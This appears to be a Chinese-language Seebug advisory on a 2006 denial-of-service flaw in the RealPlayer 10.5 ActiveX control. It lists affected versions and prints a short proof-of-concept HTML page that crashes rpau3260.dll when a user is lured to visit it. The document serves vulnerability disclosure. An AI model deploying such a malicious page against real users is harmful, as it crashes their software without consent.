RealNetworks RealPlayer ActiveX控件远程拒绝服务漏洞

2006-12-22T00:00:00
ID SSV:1014
Type seebug
Reporter Root
Modified 2006-12-22T00:00:00

Description

RealNetworks RealPlayer是一款流行的媒体播放软件。

RealNetworks RealPlayer ActiveX控件处理存在安全问题,远程攻击者可以利用漏洞对应用程序进行拒绝服务攻击。

构建如下的恶意页面,诱使用户使用RealPlayer 10.5访问,可导致rpau3260.dll出现问题,而使应用程序崩溃:

<html> <body> <object classid="clsid:405DE7C0-E7DD-11D2-92C5-00C0F01F77C1" id="RealPlayer"> </object> <script> RealPlayer.Initialize("AA","defaultV") </script> </html> </body>

Real Networks RealPlayer 10.5 v6.0.12.1235 Real Networks RealPlayer 10.5 v6.0.12.1069 Real Networks RealPlayer 10.5 v6.0.12.1059 Real Networks RealPlayer 10.5 v6.0.12.1056 Real Networks RealPlayer 10.5 v6.0.12.1053 Real Networks RealPlayer 10.5 v6.0.12.1040 Real Networks RealPlayer 10.5 Beta v6.0.12.1016 Real Networks RealPlayer 10.5 Real Networks RealPlayer 10.5 Real Networks RealPlayer 10.5

目前没有详细解决方案提供:

<a href="http://www.real.com/" target="_blank">http://www.real.com/</a>